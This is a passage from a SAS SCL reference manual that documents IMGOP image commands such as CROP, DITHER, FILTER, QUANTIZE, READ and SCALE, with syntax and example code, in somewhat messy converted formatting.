Copy an image. Note that the COPY command is a much faster way of doing this, and this example is here to show how to use the commands.
COPY:
width=0; height=0; type=0; depth=0; cmaplen=0;
r=0; g=0; b=0; pixel=0; pixel2=0; pixel3=0;
task-id=imginit(0,'nodisplay');
task-id2=imginit(0,'nodisplay');
/* read and query original image */
rc=imgop(task-id,'READ','first.tif');
rc=imgop(task-id,'QUERYN','WIDTH',width);
rc=imgop(task-id,'QUERYN','HEIGHT',height);
rc=imgop(task-id,'QUERYN','TYPE',type);
rc=imgop(task-id,'QUERYN','DEPTH',depth);
rc=imgop(task-id,'QUERYN','COLORMAP_LEN',
cmaplen);
/* Create the new image */
rc=imgop(task-id2,'CREATE_IMAGE',width,height,
type,depth);
/* Copy the color map */
do i=0 to cmaplen-1;
rc=imgop(task-id,'GET_COLORS',i,r,g,b);
rc=imgop(task-id2,'SET_COLORS',i,r,g,b);
end;
/* Copy the pixels */
do h=0 to height-1;
do w=0 to width-1;
rc=imgop(task-id,'GET_PIXEL',w,h,pixel,
pixel2,pixel3);
rc=imgop(task-id2,'SET_PIXEL',w,h,pixel,
pixel2,pixel3);
end;
end;
/* Write out the new image */
rc=imgop(task-id2,'WRITE','second.tif',
‘format=tif’);
rc=imgterm(task-id);
rc=imgterm(task-id2);
return;
CROP
Crops the selected image
Syntax
\[
\text{rc}=\text{IMGOP}(\text{task-id},'CROP',\text{start-x},\text{start-y}, \\
\text{end-x}, \text{end-y}); \\
\text{region-id}=\text{PICFILL}(\text{graphenv-id}, \text{type,ulr,ulc,} \\
\text{lrr,lrc,source,}'CROP',<\text{arguments}>>); \\
\]
start-x
is the row number of the upper corner.
Type: Numeric
start-y
is the column number of the upper corner.
Type: Numeric
designates
is the row number of the lower corner.
Type: Numeric
designates
is the column number of the lower corner.
Type: Numeric
Details
The start-x, start-y, end-x, and end-y points use units of pixels and are included in the new image. The top left corner of the image is (0,0).
Example
Display an image and then crop it:
name=lnamemk(1,path);
rc=imgop(task-id,'SELECT',1);
rc=imgop(task-id,'READ_PASTE',1,1,name);
if (crop eq 1) then do;
rc=imgop(task-id,' CROP',ucx,ucy,lcx,lcy);
rc=imgop(task-id,'PASTE',1,1);
end;
DESTROY
Removes an image from memory and from the display
Syntax
rc=IMGOP(task-id,'DESTROY',image-id);
image-id contains the identifier of the image to remove.
Type: Numeric
Details
DESTROY removes an image from memory and from the display. This command acts on the currently selected image unless image-id is specified. The command does not affect the image stored in the external file or catalog.
Example
Remove an image from the display:
if (remove=1 and imgnum > 0)
then
rc=imgop(task-id,'DESTROY',imgnum);
DESTROY_ALL
Removes all images from memory and from the display
Syntax
rc=IMGOP(task-id,'DESTROY_ALL');
Details
DESTROY_ALL runs the DESTROY command for all images in memory. The external image files are not affected.
Example
Remove all images:
if (clear=1) then
rc=imgop(task-id,'DESTROY_ALL');
DITHER
Dithers an image to a color map
Syntax
rc=IMGOP(task-id,'DITHER');
region-id=PICFILL(graphenv-id, type, ulr, ulc,
lrr, lrc, source < 'DITHER', arguments >>);
Details
DITHER acts on the currently selected image. It dithers an image to the current color map: the one specified by a previous GENERATE_CMAP, STANDARD_CMAP, or GRAB_CMAP command.
Like the MAP_COLORS command, DITHER reduces the number of colors in an image. Unlike the MAP_COLORS command, DITHER attempts to choose colors by looking at pixels in groups, not as single pixels, and tries to choose groups that will result in the appropriate color. This is similar to the halftoning algorithm that print vendors use to show multiple colors with the use of only four ink colors. This command is much more computationally expensive than the other color-reduction commands, but it handles continuous-tone images much better.
Example
Dither an image:
if (dither=1) then
do;
rc=imgop(task-id,'GENERATE_CMAP','COLORRAMP',
5, 5, 4);
rc=imgop(task-id,'DITHER');
rc=imgop(task-id,'PASTE');
end;
DITHER_BW
Dithers the selected image to a monochrome black and white image
Syntax
rc=IMGOP(task-id,'DITHER_BW');
region-id=\texttt{PICFILL}(\texttt{graphenv-id}, \texttt{type}, \texttt{ulr}, \texttt{ulc},
\texttt{lrr}, \texttt{lrc}, \texttt{source}, '<\texttt{DITHER\_BW}', \texttt{arguments}>>);
\textbf{Details}
This command reduces an image to a black-and-white image. \texttt{DITHER\_BW} is much more efficient for this task than the general purpose \texttt{DITHER} command.
\textbf{Example}
Dither an image either to black and white or to a color map:
\begin{verbatim}
if (dither=1) then
do;
rc=imgop(task-id,'DITHER\_BW');
rc=imgop(task-id,'PASTE');
end;
if (dither=2) then
do;
rc=imgop(task-id,'GENERATE\_CMAP',
'COLORRAMP',5,5,4);
rc=imgop(task-id,'DITHER');
rc=imgop(task-id,'PASTE');
end;
\end{verbatim}
\textbf{EXECLIST}
\textit{Executes a list of commands}
\textbf{Syntax}
\begin{verbatim}
rc=imgop(task-id,'EXECLIST',commandlist-id);
\end{verbatim}
\begin{verbatim}
region-id=\texttt{PICFILL}(\texttt{graphenv-id}, \texttt{type}, \texttt{ulr}, \texttt{ulc},
\texttt{lrr}, \texttt{lrc}, \texttt{source}, '<EXECLIST>', \texttt{arguments}>>);
\end{verbatim}
\texttt{commandlist-id}
contains the identifier of the SCL list of commands to pass and execute. The commands are processed as the task starts. A value of zero means that no list is passed.
Type: Numeric
\textbf{Details}
\texttt{EXECLIST} provides a mechanism for sending multiple commands to be processed at one time. If your program includes the same set of commands several times, you can fill an SCL list with those commands and then use \texttt{EXECLIST} to execute the commands.
Example
Create an SCL list that consists of two sublists. Each sublist contains one item for a command name and one item for each command argument.
```scl
length rc 8;
init:
task-id=imginit(0);
main_list=makelist(0, 'G');
sub_list1=makelist(0, 'G');
main_list=setiteml(main_list, sub_list1, 1, 'Y');
sub_list1=setitemc(sub_list1, 'WSIZE', 1, 'Y');
sub_list1=setitemn(sub_list1, 500, 2, 'Y');
sub_list1=setitemn(sub_list1, 500, 3, 'Y');
sub_list2=makelist(0, 'G');
main_list=setiteml(main_list, sub_list2, 2, 'Y');
sub_list2=setitemc(sub_list2, 'WTITLE', 1, 'Y');
sub_list2=setitemc(sub_list2, 'EXECLIST example',
2, 'Y');
rc=imgop(task-id, 'EXECLIST', main_list);
return;
main:
return;
term:
rc=imgterm(task-id);
return;
```
FILTER
Applies a filter to an image
Syntax
```
rc=IMGOP(task-id,'FILTER',filter-type, matrix);
```
filter-type
must be specified as ‘CONVOLUTION’. Other filter types will be added in the future.
Type: Character
matrix
contains the matrix size, the filter matrix, the divisor, the bias, and 1 if you want to use the absolute value of the resulting value. If not specified, the defaults are 1 for divisor, 0 for bias and 0 for not using the absolute value. Separate each number with a space.
Type: Character
Details
The FILTER command supports user-provided convolution filters. A filter matrix is moved along the pixels in an image, and a new pixel value is calculated and replaced at the pixel that is at the center point of the filter matrix. The new value is determined by weighting nearby pixels according to the values in the filter matrix.
A detailed explanation of the concept and theory behind filtering is beyond the scope of this document. However, it is explained in many textbooks. For example, see Digital Image Processing, by Rafael Gonzalez and Paul Wintz, and The Image Processing Handbook, by John C. Russ.
The equation used is shown in Figure A1.1 on page 750.
Figure A1.1 Calculating New Pixel Values
\[
N = \left( \left\{ \sum_{i=1}^{\text{matrix.size}} P_i M_i \right\} \right) / \text{Divisor} + \text{Bias}
\]
Where:
- \(N\) is the new pixel value (replaced in center of matrix).
- \(P\) is the pixel value in the matrix area.
- \(M\) is the filter matrix.
- Divisor is the divisor value provided.
- Bias is the bias value provided.
- Matrix.size is the size of the filter matrix (e.g. in a 3x3 filter, matrix.size is 9)
Example
<table>
<thead>
<tr>
<th>Image Pixels (P)</th>
<th>Filter Matrix (M)</th>
<th>Products</th>
<th>Sums</th>
</tr>
</thead>
<tbody>
<tr>
<td>25 10 100</td>
<td>-1 -1 -1</td>
<td>25 10 100</td>
<td>-135</td>
</tr>
<tr>
<td>10 35 25</td>
<td>-1 9 -1</td>
<td>-10 315 -25</td>
<td>280</td>
</tr>
<tr>
<td>25 0 100</td>
<td>-1 -1 -1</td>
<td>-25 0 -100</td>
<td>-125</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Sum of sums</th>
<th>20</th>
</tr>
</thead>
<tbody>
<tr>
<td>Divisor</td>
<td>1</td>
</tr>
<tr>
<td>Bias</td>
<td>1</td>
</tr>
<tr>
<td>New Pixel (N)</td>
<td>21</td>
</tr>
</tbody>
</table>
Consider the following 3x3 matrix:
\[
\begin{pmatrix}
-1 & -2 & -3 \\
4 & 5 & 6 \\
-7 & 8 & -9
\end{pmatrix}
\]
Design the matrix with a divisor of 1 and a zero bias, and use the absolute value of the answer:
```
matrix="3 -1 -2 -3 4 5 6 -7 8 -9 1 0 1";
rc=imgop(tid,'FILTER','CONVOLUTION',matrix);
```
Note: Normally calculated values that are larger than 255 and smaller than zero are normalized to 255 or zero. If 1 is set for ‘absolute value’, then negative numbers are first converted to positive numbers.
A filter selection and creation window is available. An example of using it is in the image sample catalog (imagedmo) named FILTEXAM.FRAME. It is essentially the same window that is used in the Image Editor. It accesses the filters that are shipped with the Image Editor.
---
**GAMMA**
Applies a gamma value to the selected image
---
**Syntax**
```
rc=IMGOP(task-id,'GAMMA',gamma-value);
region-id=PICFILL(graphenv-id, type,ulr,ulc,lrr,lrc,source,<'GAMMA' <,arguments>>);
```
**gamma-value**
is the gamma value to apply to the image.
Type: Numeric
**Details**
GAMMA corrects the image by either darkening or lightening it. Gamma values must be positive, with the most useful values ranging between 0.5 and 3.0. A gamma value of 1.0 results in no change to the image. Values less than 1.0 darken the image, and values greater than 1.0 lighten it.
**Example**
Apply a gamma value that has previously been stored in GAMNUM:
```
if (gamma eq 1) then
do;
rc=imgop(task-id,'GAMMA',gamnum);
if (rc ne 0) then _msg_='gamma error';
rc=imgop(task-id,'PASTE');
end;
```
GENERATE_CMAP
Generates a color map for the selected image
Syntax
rc=IMGOP(task-id,'GENERATE_CMAP', COLORRAMP,reds,greens, blues);
rc=IMGOP(task-id,'GENERATE_CMAP', GRAYRAMP,n);
reds
is the number of red colors to generate.
Type: Numeric
greens
is the number of green colors to generate.
Type: Numeric
blues
is the number of blue colors to generate.
Type: Numeric
n
is the number of gray colors to generate.
Type: Numeric
Details
GENERATE_CMAP generates two kinds of color maps:
COLORRAMP
is a color ramp of RGB colors that fill the RGB color spectrum, given the desired number of red, green, and blue shades to use. This command generates a color map of \( \text{reds} \times \text{greens} \times \text{blues} \) colors, with a maximum of 256 colors allowed. It is possible to generate a color map that consists only of reds, greens, or blues by specifying that only one shade be used for the other two colors.
GRAYRAMP
is a color map that consists only of grays. The number of shades of gray is limited to 256.
After the color map is generated, it can be applied to an image with either the DITHER command or the MAP_COLORS command.
Example
Use the GENERATE_CMAP command to generate a color ramp and a gray ramp, each containing 100 color map entries:
gray:
rc==imgop(task-id,'GENERATE_CMAP','GRAYRAMP',100);
return;
color:
rc==imgop(task-id,'GENERATE_CMAP','COLORRAMP',5,5,4);
return;
GET_BARCODE
Returns the value of the specified bar code
Syntax
rc=IMGOP(task-id,'GET_BARCODE',
bar-code-type, return-string,<x1,y1,x2,y2>);
bar-code-type
is a character string that contains one value from the following list:
'CODE39' code 39 bar codes
'CODE39X' extended code 39 bar codes
'CODE128' code 128 bar codes.
Type: Character
return-string
contains the returned value. Remember to make this variable long enough to hold
the longest value that could be returned.
Type: Character
x1,y2
are the upper coordinates of the area in the image to search for the bar code. The
default is 0,0.
x2,y2
are the lower coordinates of the area in the image to search for the bar code. The
default is the width and height of the image. Note that the area specified for the
bar-code location can be larger than the bar code. This area should be relatively free
of things like other text.
Details
Given an image with a bar code, the GET_BARCODE command attempts to decode the
bar code and then returns the value of the bar code. The bar code can be decoded only if
it is clear in the image. The DPI resolution used in scanning the image will determine
how clearly the bar code appears in the image. Below 200 DPI, recognition is very poor.
Example
Return the value of the bar code that is located in the 10,10,300,200 area of the image:
rc=imgop(taskid,'GET_BARCODE','CODE39',retstring,
10,10,300,200);
GET_COLOR
Returns the RGB values of the index positions of a color map for the selected image
Syntax
rc=IMGOP(task-id,'GET_COLOR',index,red,green,blue);
index
contains the identifier for the color map index.
Type: Numeric
red
is the red value for the index.
Type: Numeric
green
is the green value for the index.
Type: Numeric
blue
is the blue value for the index.
Type: Numeric
Details
If index is outside the valid range for the color map, an error is returned. The color values are in the range of 0 to 255.
Example
See the example for “CREATE_IMAGE” on page 743.
GET_PIXEL
Returns the pixel value of a specified position in the selected image
Syntax
rc=IMGOP(task-id,‘GET_PIXEL’,x,y,red,<green, blue>);
x
is the row location in the image.
Type: Numeric
y
is the column location in the image.
Type: Numeric
red
is either the red value of an RGB image or the pixel value for a CMAP or GRAY image.
Type: Numeric
green
is the green value for an RGB image and is ignored for all others.
Type: Numeric
blue
is the blue value for an RGB image and is ignored for all others.
Type: Numeric
Details
An error is returned if any of the values are out of bounds. The colors for a CMAP and RGB image must be between 0 and 255. For a GRAY image, GET_PIXEL returns a red value of either 0 or 1.
Example
See the example for “CREATE_IMAGE” on page 743
GRAB_CMAP
Grabs the color map from the selected image
Syntax
rc=IMGOP(task-id,’GRAB_CMAP’);
Details
After the color map is grabbed, it can be applied to another image with either the DITHER command or the MAP_COLORS command.
Example
Grab the color map of one image and then apply it to another image with the DITHER command:
```plaintext
rc=imgop(task-id,'READ','image-1');
rc=imgop(task-id,'GRAB_CMAP');
rc=imgop(task-id,'READ','image-2');
rc=imgop(task-id,'DITHER');
```
MAP_COLORS
Maps colors to the closest color in the selected color map
Syntax
```plaintext
rc=IMGOP(task-id,'MAP_COLORS',option);
region-id=PICFILL(graphenv-id,type,ulr,ulc,lrr,lrc,source,'MAP_COLORS',<arguments>);
```
**option**
specifies the order in which the colors are to be mapped. By default, the colors are mapped in an order that is defined by an internal algorithm. Specify 'SAME_ORDER' to force the color map of the image to be in the same order as the selected color map.
Type: Character
Details
MAP_COLORS acts on the currently selected image. Like the DITHER and QUANTIZE commands, MAP_COLORS reduces the number of colors in a color image. Unlike DITHER, MAP_COLORS attempts to choose colors by looking at pixels individually, not in groups. This technique is much less computationally expensive than DITHER, although it does not handle continuous-tone images as well.
Continuous-tone images contain many shades of colors. Because MAP_COLORS maps the colors in an image to their closest colors in the color map, many of the shades of a color remap to the same color in the color map. This can reduce the detail in the image. For example, a continuous-tone, black-and-white image would contain several shades of gray in addition to black and white. When MAP_COLORS remaps the colors in the image, the shades of gray are mapped to either black or white, and much of the detail in the image is lost.
Unlike the QUANTIZE command, MAP_COLORS is passed a particular color map to use. Therefore, multiple images can be reduced to the same color map, further reducing the number of colors used in a frame that contains multiple images. The algorithm
Looks at each pixel in the image and determines the closest color in the color map. This type of algorithm works best for images that are not continuous-tone images, such as charts, cartoon images, and so on.
Specify the option ‘SAME_ORDER’ if you are mapping several images and you want the color map to be identical for all of them.
**Example**
Grab the color map of one image and then apply it to another image with the MAP_COLORS command:
```plaintext
rc=imgop(task-id,'READ',image1);
rc=imgop(task-id,'GRAB_CMAP');
rc=imgop(task-id,'READ',image2);
rc=imgop(task-id,'MAP_COLORS');
```
**MIRROR**
Mirrors an image
---
**Syntax**
```plaintext
rc=IMGOP(task-id,'MIRROR');
```
**Details**
MIRROR acts on the currently selected image. It flips an image on its vertical axis, resulting in a “mirror” copy of the original image.
**Example**
Mirror an image:
```plaintext
if (mirror=1) then
rc=imgop(task-id,'MIRROR');
```
**NEGATE**
Changes an image to a negative
---
**Syntax**
```plaintext
rc=IMGOP(task-id,'NEGATE');
```
region-id=\textbf{PICFILL}(\texttt{graphenv-id,typ,ulr,ulc,lrr,lrc,source,\textless \texttt{NEGATE}\textgreater \texttt{,arguments\textgreater \textgreater});
**Details**
\textsc{NEGATE} acts on the currently selected image. It creates a photographic ‘negative’ of the image by reversing the use of dark/light colors. The negative is created by replacing each color with its complement.
**Example**
Create a negative of an image:
\begin{verbatim}
if (negative=1) then
rc=imgop(task-id,'NEGATE');
\end{verbatim}
---
**PASTE**
Displays an image at a specified location
**Syntax**
\begin{verbatim}
rc=\textbf{IMGOP}(\texttt{task-id,'PASTE'\textless\texttt{x,y}\textgreater});
\end{verbatim}
\begin{itemize}
\item \texttt{x}
\begin{itemize}
\item is the X coordinate of the top left corner of the image.
\item Type: Numeric
\end{itemize}
\item \texttt{y}
\begin{itemize}
\item is the Y coordinate of the top left corner of the image.
\item Type: Numeric
\end{itemize}
\end{itemize}
**Details**
\textsc{PASTE} acts on the currently selected image. If no coordinates are specified, the selected image is displayed either at location 0,0 or at the coordinates set by a previous \textsc{PASTE}. To set new coordinates, you can use a \textsc{PASTE} command with no image specified. Coordinates that are specified by a new \textsc{PASTE} override previous settings.
**Example**
Display an image with its upper left corner at 200, 200:
\begin{verbatim}
if (display=1) then
rc=imgop(task-id,'PASTE',200,200);
\end{verbatim}
**PASTE_AUTO**
Displays an image automatically
---
**Syntax**
\[ \text{rc} = \text{IMGOP}(\text{task-id},'PASTE\_AUTO',x,y); \]
\( x \)
is the X coordinate of the top left corner of the image.
- **Type:** Numeric
\( y \)
is the Y coordinate of the top left corner of the image.
- **Type:** Numeric
**Details**
`PASTE\_AUTO` acts on the currently selected image. It provides the same basic function as `PASTE`. In addition, `PASTE\_AUTO` modifies an image by dithering it or by reducing the number of colors it uses, so that you can display it on the current device. It also attempts to prevent switching to false colors or to a private color map.
**Example**
Automatically display an image with its upper left corner at 200, 200:
```plaintext```
if (display=1) then
rc=imgop(task-id,'PASTE\_AUTO',200,200);
```
---
**QUANTIZE**
Reduces the number of colors used for an image
---
**Syntax**
\[ \text{rc} = \text{IMGOP}(\text{task-id},'QUANTIZE',\text{colors}); \]
\[ \text{region-id} = \text{PICFILL}(\text{graphenv-id},\text{type},\text{ulr},\text{ulc},\text{lrr},\text{lrc}, \text{source},'<QUANTIZE',\text{arguments}>); \]
**colors**
is the number of colors to use for the image. The `colors` variable must have a value from 2 through 256.
Type: Numeric
Details
QUANTIZE acts on the currently selected image. It generates a color-mapped image for which the command assigns the values in the color map. QUANTIZE results in a very good approximation of the image, with the possible negative effect that two or more images quantized to the same number of colors may still use different colors for each image. (The algorithm is an adaptation of the Xiaolin Wu algorithm, as described in Graphics Gems II.*)
Example
Reduce the number of colors for an image to the number stored in NUMCOLOR:
```c
if (quantize eq 1) then
rc=imgop(task-id,'QUANTIZE',numcolor);
```
---
**QUERYC, QUERYL, and QUERYN**
Query information about images
**Syntax**
```c
rc=IMGOP(task-id,'QUERYC',attribute,information);
rc=IMGOP(task-id,'QUERYL',attribute,list-id);
rc=IMGOP(task-id,'QUERYN',attribute,information);
```
**attribute**
is the value to report. Attributes for QUERYC are listed in “Attributes for the QUERYC Command” on page 761. Attributes for QUERYL are listed in “Attributes for the QUERYL Command” on page 761. Attributes for QUERYN are listed in “Attributes for the QUERYN Command” on page 762.
Type: Character
**information**
contains the information that is returned by QUERYC and QUERYN. This variable is character when used by QUERYC and numeric when returned by QUERYN.
Type: Character or Numeric
**list-id**
contains the identifier for the SCL list of information items that are returned by QUERYL. See attribute for details.
---
Attributes for the QUERYC Command
The values for attribute for QUERYC are:
- **DESCRIPT**
returns information about the image size and color map. The information can be up to 45 characters long.
- **FILENAME**
returns the image path string.
- **FORMAT**
returns the original file format, such as GIF.
- **TYPE**
returns the IMAGE type, which can be 'CMAP', 'GRAY', or 'RGBA'.
Attributes for the QUERYL Command
The values for attribute for QUERYL are:
- **ACTIVE_LIST**
returns an SCL list containing the identifiers for all active images (images that are being used but that are not necessarily visible).
- **VISIBLE_LIST**
returns an SCL list containing the identifiers for all currently displayed images.
- **SELECT_INFO**
returns a named SCL list containing the numeric values for the currently selected image:
- **IS_ACTIVE**
has a value of 1 if the image is being used and has data associated with it. If IS_ACTIVE=1, the following items are also returned:
- **WIDTH** the image width in pixels
- **HEIGHT** the image height in pixels
- **DEPTH** the image depth
- **TYPE** the image type: 'CMAP', 'GRAY', 'RGBA'
- **IS_VISIBLE**
has a value of 1 if the image is being displayed.
- **XPOSN**
is the x position.
- **YPOSN**
is the y position.
- **NCOLORS**
is the number of colors, if TYPE='CMAP' (color mapped)
RDEPTH
is the red depth, if TYPE='RGBA'
GDEPTH
is the green depth, if TYPE='RGBA'
BDEPTH
is the blue depth, if TYPE='RGBA'
ADEPTH
is the alpha depth (degree of transparency), if TYPE='RGBA'
GLOBAL_INFO
returns a named list that contains the following items:
NUM_ACTIVE
is the number of active images used but not necessarily visible.
SELECT
is the identifier of the currently selected image.
WSIZE_WIDTH
is the window width in pixels.
WSIZE_HEIGHT
is the window height in pixels.
Attributes for the QUERYN Command
The values for attribute for QUERYN are:
ADEPTH
returns the alpha depth.
BDEPTH
returns the blue depth.
COLORMAP-LEN
returns the size of the color map.
DEPTH
returns the image depth.
GDEPTH
returns the green depth.
HEIGHT
returns the image height in pixels.
IS_BLANK
returns a value that indicates whether the current page is blank:
1 blank
0 not blank (valid for monochrome images only).
NCOLORS
returns the number of colors.
RDEPTH
returns the red depth.
SELECT
returns the identifier of the currently selected image.
TYPE
returns the image type:
1 gray-scale
2 color mapped
3 RGBA.
WIDTH
returns the image width in pixels.
Details
The QUERYC, QUERYL, and QUERYN commands return information about all images as well as above the Image window. QUERYC returns the values of character attributes. QUERYL returns the values of attributes stored in an SCL list. QUERYN returns the values of numeric attributes. These commands act on the image that is currently selected.
Examples
Example 1: Using QUERYC Display an image's description, filename, format, and type:
rc=imgop(task-id,'READ',
'/usr/local/images/color/misc/canoe.gif');
rc=imgop(task-id,'QUERYC','DESCRIPT',idescr);
pout idescr=;
rc=imgop(task-id,'QUERYC','FILENAME',ifile);
pout ifile=;
rc=imgop(task-id,'QUERYC','FORMAT',iformat);
pout iformat=;
rc=imgop(task-id,'QUERYC','TYPE',itype);
pout itype=;
This program writes the following lines to the LOG window:
IDESCR=640x480 8-bit CMAP, 256 colormap entries
IFILE=/usr/local/images/color/misc/canoe.gif
IFORMAT=GIF
ITYPE=CMAP
Example 2: Using QUERYL
Display the number of active images:
qlist=0;
rc=imgop(task-id,'SELECT',1);
rc=imgop(task-id,'READ',path1);
rc=imgop(task-id,'SELECT',2);
rc=imgop(task-id,'READ',path2);
rc=imgop(task-id,'PASTE');
rc=imgop(task-id,'QUERYL','ACTIVE_LIST',qlist);
images=listlen(qlist);
put images=;
This program writes the following line to the LOG window:
images=2
Display an SCL list of information about the current image:
qlist=makelist();
rc=imgop(task-id,'SELECT',1);
rc=imgop(task-id,'READ',path);
rc=imgop(task-id,'QUERYL','SELECT_INFO',qlist);
call putlist(qlist);
This program writes the following information to the LOG window:
(IS_ACTIVE=1 IS_VISIBLE=0 XPOSN=0 YPOSN=0 WIDTH=1024
HEIGHT=768 DEPTH=8 TYPE='CMAP' NCOLORS=253 )
Display an SCL list of information about the Image window:
qlist=makelist();
rc=imgop(task-id,'SELECT',1);
rc=imgop(task-id,'READ',path);
rc=imgop(task-id,'QUERYL','GLOBAL_INFO',qlist);
call putlist(qlist);
When the program is run, the following lines are written to the LOG window:
(NUM_ACTIVE=1 SELECT=1 WSIZE_WIDTH=682
WSIZE_HEIGHT=475 )
Example 3: Using QUERYN
Display information about the Image window. (Assume that all variables have been initialized prior to being used.)
rc=imgop(task-id,'READ',path);
rc=imgop(task-id,'QUERYN','SELECT',select);
rc=imgop(task-id,'QUERYN','HEIGHT',height);
rc=imgop(task-id,'QUERYN','WIDTH',width);
rc=imgop(task-id,'QUERYN','DEPTH',depth);
rc=imgop(task-id,'QUERYN','RDEPTH',rdepth);
rc=imgop(task-id,'QUERYN','GDEPTH',gdepth);
rc=imgop(task-id,'QUERYN','BDEPTH',bdepth);
rc=imgop(task-id,'QUERYN','ADEPTH',adepth);
rc=imgop(task-id,'QUERYN','NCOLORS',ncolors);
rc=imgop(task-id,'QUERYN','TYPE',type);
put select= height= width= depth= rdepth= gdepth=;
put bdepth= adepth= ncolors= type= ;
This program returns the following values:
SELECT=1 HEIGHT=470 WIDTH=625 DEPTH=8 RDEPTH=0
GDEPTH=0 BDEPTH=0 ADEPTH=0 NCOLORS=229 TYPE=2
READ
Reads an image from an external file, a SAS catalog, or a device
Syntax
rc=IMGOP(task-id, 'READ', pathname <,attributes >);
rc=IMGOP(task-id, 'READ', device-name, 'DEVICE=CAMERA | SCANNER <attributes >);
pathname
is the pathname of the external file that contains the image or the path string that is returned by the LNAMEMK function.
Type: Character
device-name
specifies the name of a camera or scanner:
'KODAKDC40'
Kodak DC 40 camera (available only under the Windows 95 operating system)
'HPSCAN'
HP Scanjet scanners (available only under Windows and HP/UX operating systems)
If you specify a device name, then you must use the DEVICE = attribute to indicate the type of device.
Type: Character
attributes
are file- or device-specific attributes. See "Attributes for Reading and Writing Files" on page 782 for possible choices.
Type: Character
Details
Read acts on the currently selected image. You can specify the file directly (using its physical filename path), or by using the information returned by a previous LNAMEMK function call. The LNAMEMK function creates a single character variable that contains location information about the image (even if it resides in a SAS catalog), as well as other image attributes.
The FORMAT = attribute must be specified for Targa images, for images that reside in SAS catalogs, and for host-specific formats. FORMAT is not required in other cases, but it is always more efficient to specify it.
Examples
- Read an image that is stored in a SAS catalog:
path=lnamemk(5,'sashelp.imagapp.gfkids',
'format=cat');
Appendix 1
rc=imgop(task-id,'READ',path);
- Specify a file in the READ command:
rc=imgop(task-id,'READ',
'/usr/images/color/sign.gif');
- Read from a scanner:
rc=imgop(task-id,'READ', 'hpscan',
'device=scanner dpi=100');
- Take a picture with a camera:
rc=imgop(task-id,'READ',
'kodakdc40',
'device=camera takepic');
- Read a Portable Networks Graphics image:
rc=imgop(taskid,'READ','/images/test.png',
'format=PNG ');
- Read an image using READ and wait 5 seconds before displaying the image after each PASTE command:
rc=imgop(taskid,'READ',path);
rc=imgop(taskid,'PASTE');
rc=imgctrl(taskid,'WAIT',5);
rc=imgop(taskid,'READ',path2);
rc=imgop(taskid,'PASTE');
rc=imgctrl(taskid,'WAIT',5);
---
**READ_CLIPBOARD**
Reads an image from the host clipboard
---
**Syntax**
rc=IMGOP(task-id,'READ_CLIPBOARD');
**Details**
READ_CLIPBOARD acts on the currently selected image. On some hosts, the clipboard can be read only after you use the WRITE_CLIPBOARD command.
**Example**
Read an image from the clipboard and display it:
rc=imgop(task-id,'READ_CLIPBOARD');
rc=imgop(task-id,'PASTE');
READ_PASTE
Reads and displays an image
Syntax
rc=IMGOP(task-id,'READ_PASTE',x,y,image-path,<,attributes>);
x
is the X coordinate of the top left corner of the image.
Type: Numeric
y
is the Y coordinate of the top left corner of the image.
Type: Numeric
image-path
contains the pathname of the external file that contains the image or the path string that is returned by the LNAMEMK function.
Type: Character
attributes
are file-specific attributes. See “Attributes for Reading and Writing Files” on page 782 for possible choices.
Type: Character
Details
READ_PASTE acts on the currently selected image. It provides the same functionality as READ and PASTE. Notice that x and y are required.
Example
Read and paste an image that is stored in a SAS catalog:
path=lnamemk(5,'sashelp.imagapp.gfkids',
'format=cat');
rc=imgop(task-id,'READ_PASTE',1,1,path);
READ_PASTE_AUTO
Reads and automatically displays an image
Syntax
\[ \text{rc} = \text{IMGOP}(\text{task-id},'\text{READ\_PASTE\_AUTO}',x,y,\text{image-path} <, \text{attributes}>); \]
\( x \)
is the X coordinate of the top left corner of the image.
Type: Numeric
\( y \)
is the Y coordinate of the top left corner of the image.
Type: Numeric
\( \text{image-path} \)
contains the pathname of the external file that contains the image or the path string that is returned by the \text{LNAMEMK} function.
Type: Character
\( \text{attributes} \)
are file-specific attributes. See “Attributes for Reading and Writing Files” on page 782 for possible choices.
Type: Character
Details
\text{READ\_PASTE\_AUTO} acts on the currently selected image. It provides the same functionality as \text{READ} and \text{PASTE\_AUTO}. Notice that \( x \) and \( y \) are required.
Example
Read and automatically paste an image that is stored in a SAS catalog:
\[ \text{path} = \text{lnamemk}(5,'\text{sashelp.imagapp.gfkids}','\text{format=cat}'); \]
\[ \text{rc} = \text{imgop}(\text{task-id},'\text{READ\_PASTE\_AUTO}',1,1,\text{path}); \]
\subsection*{ROTATE}
Rotates an image clockwise by 90, 180, or 270 degrees
Syntax
\[ \text{rc} = \text{IMGOP}(\text{task-id},'\text{ROTATE}',\text{degrees}); \]
\[ \text{region-id} = \text{PICFILL}(\text{graphenv-id},\text{type},\text{ulr},\text{ulc},\text{lrr},\text{lrc},\text{source},<\text{ROTATE}',<\text{arguments}>); \]
**degrees**
is the number of degrees to rotate the image: 90, 180, or 270.
Type: Numeric
**Details**
**ROTATE** acts on the currently selected image.
**Example**
Rotate an image the number of degrees stored in RV:
```plaintext
main:
rc=imgop(task-id,'READ',path);
if (rv ge 90) then
do;
rc=imgop(task-id,'ROTATE',rv);
rc=imgop(task-id,'PASTE');
end;
return;
```
---
**SCALE**
Scales an image
**Syntax**
```plaintext
rc=IMGOP(task-id,'SCALE',width,height<,algorithm>);
region-id=PICFILL(graphenv-id,type,ulr,ulc,lrr,lrc,source,<SCALE'<,arguments>>);
```
**width**
is the new width of the image (in pixels).
Type: Numeric
**height**
is the new height of the image (in pixels).
Type: Numeric
**algorithm**
specifies which scaling algorithm to use:
**BILINEAR**
computes each new pixel in the final image by averaging four pixels in the source image and using that value. The **BILINEAR** algorithm is more computationally expensive than **LINEAR**, but it preserves details in the image better.
LINEAR replicates pixels when the image is scaled up and discards pixels when the image is scaled down. The LINEAR algorithm yields good results on most images. However, it does not work very well when you are scaling down an image that contains small, but important, features such as lines that are only one pixel wide. LINEAR is the default.
Type: Character
Details
SCALE acts on the currently selected image. It scales the image to a new image. The size of the new image is specified in pixels; however, if one of the two values is -1, then the value used for that scale factor is computed to conserve the original image's aspect ratio.
Example
Double the size of an image:
main:
rc=imgop(task-id,'READ',path);
rc=imgop(task-id,'QUERYN','WIDTH',width);
rc=imgop(task-id,'SCALE',2*width,-1);
rc=imgop(task-id,'PASTE');
return;
SELECT
Selects the image identifier to be used in other commands
Syntax
rc=IMGOP(task-id,'SELECT'<,image-id>);
image-id contains the identifier of the image to select. The default is 1. The image-id variable must be a number between 1 and 999, inclusive. Using lower sequential numbers (under 32) is more efficient.
Type: Numeric
Details
